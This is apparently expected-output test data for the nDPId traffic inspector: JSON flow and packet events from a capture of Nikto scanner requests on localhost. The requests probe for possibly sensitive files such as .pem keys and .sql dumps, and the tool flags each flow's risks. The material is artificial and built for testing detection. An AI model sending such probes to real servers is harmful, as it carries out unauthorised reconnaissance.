00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":276,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":276,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277098,"flow_last_seen":1576420277098,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277098,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50096,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":276,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":276,"flow_packet_id":1,"flow_last_seen":1576420277098,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420277098,"pkt":"AAAAAAAAAAAAAAAACABFAADCRRhAAEAG9xt\/AAABfwAAAcOwH5DRhn1t\/ojAOIAYAED+tgAAAQEICp1m\/JGdZvyRR0VUIC8xMjcwMDEuY2VyIEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
01056{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":276,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":276,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277098,"flow_last_seen":1576420277098,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277098,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50096,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127001.cer","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":277,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":277,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277100,"flow_last_seen":1576420277100,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277100,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50098,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00662{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":277,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":277,"flow_packet_id":1,"flow_last_seen":1576420277100,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420277100,"pkt":"AAAAAAAAAAAAAAAACABFAAC931JAAEAGXOZ\/AAABfwAAAcOyH5BYxOcsixzBAIAYAED+sQAAAQEICp1m\/JSdZvyUR0VUIC8wLmNlciBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="}
01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":277,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":277,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277100,"flow_last_seen":1576420277100,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277100,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50098,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0.cer","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":278,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":278,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277106,"flow_last_seen":1576420277106,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277106,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50100,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00662{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":278,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":278,"flow_packet_id":1,"flow_last_seen":1576420277106,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420277106,"pkt":"AAAAAAAAAAAAAAAACABFAAC9aFtAAEAG091\/AAABfwAAAcO0H5ATAFAmoohjQYAYAED+sQAAAQEICp1m\/JqdZvyaR0VUIC8wLmNlciBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KDQo="}
01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":278,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":278,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277106,"flow_last_seen":1576420277106,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277106,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50100,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0.cer","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":279,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":279,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277109,"flow_last_seen":1576420277109,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277109,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50102,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":279,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":279,"flow_packet_id":1,"flow_last_seen":1576420277109,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420277109,"pkt":"AAAAAAAAAAAAAAAACABFAADFvlhAAEAGfdh\/AAABfwAAAcO2H5BO24YshrKR94AYAED+uQAAAQEICp1m\/J2dZvydR0VUIC8xMjcuMC4wLjEuZWdnIEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":279,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":279,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277109,"flow_last_seen":1576420277109,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277109,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50102,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.1.egg","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":280,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":280,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277113,"flow_last_seen":1576420277113,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277113,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50104,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":280,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":280,"flow_packet_id":1,"flow_last_seen":1576420277113,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420277113,"pkt":"AAAAAAAAAAAAAAAACABFAADF+v9AAEAGQTF\/AAABfwAAAcO4H5AzScKEmziDBYAYAED+uQAAAQEICp1m\/KGdZvyhR0VUIC8xMjcuMC4wLjEuZWdnIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="}
01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":280,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":280,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277113,"flow_last_seen":1576420277113,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277113,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50104,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.1.egg","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":281,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":281,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277115,"flow_last_seen":1576420277115,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277115,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50106,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":281,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":281,"flow_packet_id":1,"flow_last_seen":1576420277115,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420277115,"pkt":"AAAAAAAAAAAAAAAACABFAADAxXJAAEAGdsN\/AAABfwAAAcO6H5BPqv0Pb+YcGYAYAED+tAAAAQEICp1m\/KOdZvyjR0VUIC8xMjcwLmVnZyBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KDQo="}
01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":281,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":281,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277115,"flow_last_seen":1576420277115,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277115,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50106,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1270.egg","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":282,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":282,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277116,"flow_last_seen":1576420277116,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277116,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50108,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":282,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":282,"flow_packet_id":1,"flow_last_seen":1576420277116,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420277116,"pkt":"AAAAAAAAAAAAAAAACABFAADAsDlAAEAGi\/x\/AAABfwAAAcO8H5B5M4hJ8rxYu4AYAED+tAAAAQEICp1m\/KSdZvykR0VUIC8xMjcwLmVnZyBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="}
01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":282,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":282,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277116,"flow_last_seen":1576420277116,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277116,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50108,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1270.egg","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":283,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":283,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277118,"flow_last_seen":1576420277118,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277118,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50110,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":283,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":283,"flow_packet_id":1,"flow_last_seen":1576420277118,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420277118,"pkt":"AAAAAAAAAAAAAAAACABFAADBWpRAAEAG4aB\/AAABfwAAAcO+H5A50mLuGW1voYAYAED+tQAAAQEICp1m\/KadZvymR0VUIC8xMjcwMC5wZW0gSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCg0K"}
01055{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":283,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":283,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277118,"flow_last_seen":1576420277118,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277118,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50110,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/12700.pem","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":284,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":284,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277119,"flow_last_seen":1576420277119,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277119,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50112,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":284,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":284,"flow_packet_id":1,"flow_last_seen":1576420277119,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420277119,"pkt":"AAAAAAAAAAAAAAAACABFAADBojBAAEAGmgR\/AAABfwAAAcPAH5CoeZpSE7JOEoAYAED+tQAAAQEICp1m\/KedZvynR0VUIC8xMjcwMC5wZW0gSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"}
01055{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":284,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":284,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277119,"flow_last_seen":1576420277119,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277119,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50112,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/12700.pem","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":285,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":285,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277121,"flow_last_seen":1576420277121,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277121,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50114,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":285,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":285,"flow_packet_id":1,"flow_last_seen":1576420277121,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420277121,"pkt":"AAAAAAAAAAAAAAAACABFAADB1+ZAAEAGZE5\/AAABfwAAAcPCH5Dv1e9lqA5LqYAYAED+tQAAAQEICp1m\/KidZvyoR0VUIC8xMjcwMC5zcWwgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCg0K"}
01055{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":285,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":285,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277121,"flow_last_seen":1576420277121,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277121,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50114,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/12700.sql","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":286,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":286,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277122,"flow_last_seen":1576420277122,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277122,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50116,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":286,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":286,"flow_packet_id":1,"flow_last_seen":1576420277122,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420277122,"pkt":"AAAAAAAAAAAAAAAACABFAADBr9xAAEAGjFh\/AAABfwAAAcPEH5A9f5dbU\/lctoAYAED+tQAAAQEICp1m\/KqdZvyqR0VUIC8xMjcwMC5zcWwgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"}
01055{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":286,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":286,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277122,"flow_last_seen":1576420277122,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277122,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50116,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/12700.sql","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
